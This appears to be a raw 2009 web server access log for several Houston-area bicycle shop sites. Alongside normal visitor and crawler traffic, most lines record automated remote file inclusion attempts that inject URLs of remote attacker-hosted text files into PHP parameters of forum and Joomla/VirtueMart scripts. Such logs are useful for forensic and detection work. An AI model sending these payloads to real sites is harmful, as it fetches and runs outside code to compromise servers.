74.54.223.100 - - [11/Dec/2009:14:36:06 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.54.223.100 - - [11/Dec/2009:14:36:06 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.251.183.104 - - [11/Dec/2009:14:40:52 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.fisherbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
212.251.183.104 - - [11/Dec/2009:14:40:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
212.251.183.104 - - [11/Dec/2009:14:40:56 -0800] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
212.251.183.104 - - [11/Dec/2009:14:41:03 -0800] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
66.249.65.124 - - [11/Dec/2009:14:41:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "houstonbikeshop.com"
212.251.183.104 - - [11/Dec/2009:14:41:10 -0800] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
212.251.183.104 - - [11/Dec/2009:14:41:18 -0800] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nb-no) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.svbikes.com"
193.47.80.45 - - [11/Dec/2009:15:29:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [11/Dec/2009:15:29:52 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
98.196.142.44 - - [11/Dec/2009:15:43:24 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
98.196.142.44 - - [11/Dec/2009:15:43:24 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
95.215.1.13 - - [11/Dec/2009:16:12:24 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "www.svbikes.com"
95.215.1.13 - - [11/Dec/2009:16:12:25 -0800] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "www.svbikes.com"
95.215.1.13 - - [11/Dec/2009:16:12:26 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "www.svbikes.com"
208.80.193.40 - - [11/Dec/2009:16:16:30 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )" "svbikes.com"
202.131.226.52 - - [11/Dec/2009:16:32:32 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://divecrayzy.com/Scripts/chokeng1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [11/Dec/2009:16:32:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://divecrayzy.com/Scripts/chokeng1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [11/Dec/2009:16:32:32 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://divecrayzy.com/Scripts/chokeng1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [11/Dec/2009:16:32:32 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://divecrayzy.com/Scripts/chokeng1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [11/Dec/2009:17:24:37 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [11/Dec/2009:17:24:37 -0800] "GET /logs/access.log%20%20/skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [11/Dec/2009:17:24:37 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [11/Dec/2009:17:25:38 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [11/Dec/2009:17:25:38 -0800] "GET /logs/access.log%20%20/skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [11/Dec/2009:17:25:38 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [11/Dec/2009:17:37:15 -0800] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:17:48:58 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://lala1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:17:48:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://lala1.fileave.com/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:17:48:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://lala1.fileave.com/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:17:51:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://lala1.fileave.com/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:17:51:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://lala1.fileave.com/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:17:53:25 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:17:53:25 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:17:53:27 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:34 -0800] "GET /logs/access.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:34 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:34 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:35 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:35 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:17:53:35 -0800] "GET /logs/access.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:17:58:44 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:18:05:50 -0800] "GET /logs/access.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:18:05:50 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:18:05:50 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:14:59 -0800] "GET /logs/access.log//bbs///skin/ggambo_board/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:14:59 -0800] "GET /bbs///skin/ggambo_board/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:14:59 -0800] "GET /logs//bbs///skin/ggambo_board/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:21:02 -0800] "GET /logs/access.log//bbs///skin/buzzard_espoon/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:21:02 -0800] "GET /bbs///skin/buzzard_espoon/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:21:02 -0800] "GET /logs//bbs///skin/buzzard_espoon/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:32:02 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:32:02 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:32:02 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:32:40 -0800] "GET /logs/access.log//joseph/bbs2///skin/ggaggo_pds/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:32:43 -0800] "GET /logs//joseph/bbs2///skin/ggaggo_pds/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:34:22 -0800] "GET /logs/access.log//joseph/bbs2///skin/ggaggo_pds/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:34:22 -0800] "GET /logs//joseph/bbs2///skin/ggaggo_pds/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:34:25 -0800] "GET /joseph/bbs2///skin/ggaggo_pds/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:34:58 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:18:34:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:18:34:58 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:18:36:09 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:18:36:09 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:18:36:10 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:18:40:30 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:40:30 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:40:30 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:43:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:43:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:43:34 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:44:04 -0800] "GET /logs/access.log///zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:44:04 -0800] "GET /logs///zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:44:04 -0800] "GET //zboard4/skin/06rm_aab_thumb_10up//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:45:13 -0800] "GET /bbs/skin/uks_board_v3010_up10//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:45:13 -0800] "GET /logs/access.log//bbs/skin/uks_board_v3010_up10//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:18:45:16 -0800] "GET /logs//bbs/skin/uks_board_v3010_up10//write.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:46:53 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.37.165.86 - - [11/Dec/2009:18:47:42 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:47:42 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:49:48 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:49:49 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:49:49 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:53:16 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:53:16 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:53:16 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:54:37 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:54:51 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:54:51 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:54:51 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:55:01 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:55:01 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:55:01 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:18:55:08 -0800] "GET /logs/access.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:18:55:08 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:18:55:09 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.165.86 - - [11/Dec/2009:18:57:56 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:18:58:25 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:18:59:09 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:04:42 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:09:18 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:09:18 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:09:18 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:12:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
